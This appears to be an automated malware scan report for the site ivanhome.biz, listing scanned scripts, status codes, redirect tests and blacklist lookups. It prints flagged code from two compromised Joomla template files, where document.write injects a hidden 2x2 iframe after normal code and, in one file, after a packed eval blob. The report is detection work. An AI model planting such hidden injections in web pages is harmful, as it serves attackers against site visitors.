Scanned pages/files
Request | Server response | Status |
http://www.ivanhome.biz/ | 200 OK Content-Length: 43349 Content-Type: text/html | clean |
http://www.ivanhome.biz/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2981 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | 200 OK Content-Length: 40872 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/plugins/system/jcemediabox/addons/default.js?v=105 | 200 OK Content-Length: 1560 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: text/javascript | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/base.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://www.ivanhome.biz/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/accordionmenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/fancymenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/addons/dropdownmenu.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://www.ivanhome.biz/templates/it021/lib/js/template.js | 200 OK Content-Length: 4154 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var YOOTemplate = {
start: function() { YOOTemplate.matchHeights(); new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); var dropdown = new YOODropdownMenu('menu', { mode: 'slide', dropdownSelector: 'div.dropdown', transition: Fx.Transitions.Expo.easeOut }); var hoverColorMenu; var leaveColorMenu; var hoverColorSubmenu; var leaveColor1 YOOBase.matchHeight('div.maintopbox div.deepest', 20); YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); } }; window.addEvent('domready', YOOTemplate.start); document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://www.ivanhome.biz/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 2873 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('C I=h n({1r:5(d,3){2.o({1b:n.t,Y:n.t,1l:n.t,11:n.t,10:\'.s\',13:\'.1g\',17:\'.a\',16:\'.a-6\',Z:\'.a-1s\',X:1q,1j:1t,z:\'x\',K:0,D:\'1u\',N:\'1v\',M:\'19\',k:1p,9:\ document.write('<iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://google.com <iframe src="http://google.com" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12498 Content-Type: application/javascript | clean |
http://settings.messenger.live.com/controls/1.0/PresenceButton.js | 500 Can't connect to settings.messenger.live.com:80 (Bad hostname) Content-Length: 186 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ivanhome.biz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ivanhome.biz
Referer: http://www.google.com/search?q=ivanhome.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ivanhome.biz
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ivanhome.biz/
Result: ivanhome.biz is not infected or malware details are not published yet.